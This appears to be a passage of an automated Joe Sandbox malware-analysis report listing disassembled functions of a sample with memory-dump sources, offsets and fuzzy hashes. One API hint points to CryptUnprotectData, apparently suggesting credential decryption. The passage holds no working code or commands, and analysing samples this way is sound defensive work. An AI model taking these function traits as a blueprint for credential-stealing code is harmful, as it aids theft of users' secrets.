                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                        • String ID:
                                        • API String ID: 2068576380-0
                                        • Opcode ID: 19bd45c65fb8e1b93c7fe6a06d9e3a4d1809d829b319cc9d0af8a451c7de07d2
                                        • Instruction ID: 9135083948b848140940535002425f7f7cbd6f99e4ab2cd5f7d444dfc22aa735
                                        • Opcode Fuzzy Hash: 19bd45c65fb8e1b93c7fe6a06d9e3a4d1809d829b319cc9d0af8a451c7de07d2
                                        • Instruction Fuzzy Hash: 3511F7B9A00209EFCB04DFA4D988AAEB7B9FF89300F108559ED15A7350D730AE50CF61
                                        Function 009E4BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ?$__ZN
                                        • API String ID: 0-1427190319
                                        • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                        • Instruction ID: b9253ee1eace5213dd0986cdf16a355dd23ef8a7f27ab2ed9e5e70be412e74c3
                                        • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                        • Instruction Fuzzy Hash: BE724472908B919BC716CF16C88076AB7E6BFC5314F1A8A1DF9A55B291D370DC41CB82
                                        Function 00DD4436 Relevance: 2.8, Strings: 1, Instructions: 1584COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: m%_?
                                        • API String ID: 0-1573591151
                                        • Opcode ID: 204f2ef550d4e92ae86d34623f043e8396e82ff99e2826f642550e3b9fd2d775
                                        • Instruction ID: 2fc3c73312b6a8fc5cfdd797b9ad1ac2b1064de54e0190cf96335c189b9f1149
                                        • Opcode Fuzzy Hash: 204f2ef550d4e92ae86d34623f043e8396e82ff99e2826f642550e3b9fd2d775
                                        • Instruction Fuzzy Hash: 96B2F7F39082149FE304AE2DEC8577ABBE9EF94720F1A453DEAC4C3744E63598058796
                                        Function 009C5DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: xn--
                                        • API String ID: 0-2826155999
                                        • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                        • Instruction ID: d106730460addccdb8fa4501f800fe6b15016b277f9ea7ecf5fd4c1b2990ff71
                                        • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                        • Instruction Fuzzy Hash: 94A214B1C042688AEF18CB58C890BFDBBB5FF85300F1842AED55677281D7795E85CB62
                                        Function 009C4DC8 Relevance: 1.9, APIs: 1, Instructions: 411COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID:
                                        • API String ID: 3732870572-0
                                        • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                        • Instruction ID: 0ae7a8a1284a1334880acbcbe97ce92f4927c0f6089ebb0d9088dee2a00c3a0e
                                        • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                        • Instruction Fuzzy Hash: 2BE1D031A083459FC725CF28C890BAEB7E6EFC9300F56492DE4D99B291D731A845CB83
                                        Function 009C4868 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID:
                                        • API String ID: 3732870572-0
                                        • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                        • Instruction ID: dd43357317ce7b0039d00a4805a40daa293f728929d03922f3d878774a990c83
                                        • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                        • Instruction Fuzzy Hash: DEE1A331B083119FDB24DE18C8A1BAEB7E6EFC5310F15892DE99A9B251D730EC458B47
                                        Function 009DE258 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: UNC\
                                        • API String ID: 0-505053535
                                        • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                        • Instruction ID: 580b6b430ca6319c089b7ebce639aa6418ae94da1850cb5c81ef93dbbb507d7f
                                        • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                        • Instruction Fuzzy Hash: E9E14C71D442658EEF10DF18C8843BEBBE2AB85318F59C16BD4646F392D3398D46CB90
                                        Function 00CC2AA3 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: $2W
                                        • API String ID: 0-308605316
                                        • Opcode ID: f2e1acc581b7a3b6793bbbef7bb2d155fac45e12691684853f51c07e6c0e374e
                                        • Instruction ID: 8f2a59bbb625ecb1f8c42b12dc6754fae05192b65747723aaff5d2584b3d2075
                                        • Opcode Fuzzy Hash: f2e1acc581b7a3b6793bbbef7bb2d155fac45e12691684853f51c07e6c0e374e
                                        • Instruction Fuzzy Hash: D141F8F3B181005BF314A92DDCD477BF6DAEBD8310F2A863D9688D7784E97998064282
                                        Function 00C7A413 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: {#u|
                                        • API String ID: 0-2894770332
                                        • Opcode ID: f0241f2b75db2304ad6a7c0768503bcd6de328438727cdb941a285c9e5e48093
                                        • Instruction ID: cbd4eb6603b7f4a3bb3fc658acb6cc14d5429585fd949271a5558f7002ff3229
                                        • Opcode Fuzzy Hash: f0241f2b75db2304ad6a7c0768503bcd6de328438727cdb941a285c9e5e48093
                                        • Instruction Fuzzy Hash: 2441E5F3A096049FE3049E29EC8076AF7E6EF94324F1A893DE5C487744DA7948428B43
                                        Function 0099E544 Relevance: .8, Instructions: 823COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                        • Instruction ID: adb18b3680311eaa858e096e013827f1e1fc459edc1722d5a0ce518dc13071d5
                                        • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                        • Instruction Fuzzy Hash: 6482F175900F448FD765CF29C880B92F7E5BF9A300F548A2ED9EA8B651DB30B545CB90
                                        Function 009B8E78 Relevance: .6, Instructions: 649COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                        • Instruction ID: 322927ca2862d09e23cd3c48a045ba0e9d89973d1bbaf355a09d1b7c64253811
                                        • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                        • Instruction Fuzzy Hash: CF42E6706147418FC735CF18C2907A5FBE6BF89320F288A6DDA868B791D779E885CB50
                                        Function 009EAC28 Relevance: .5, Instructions: 501COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
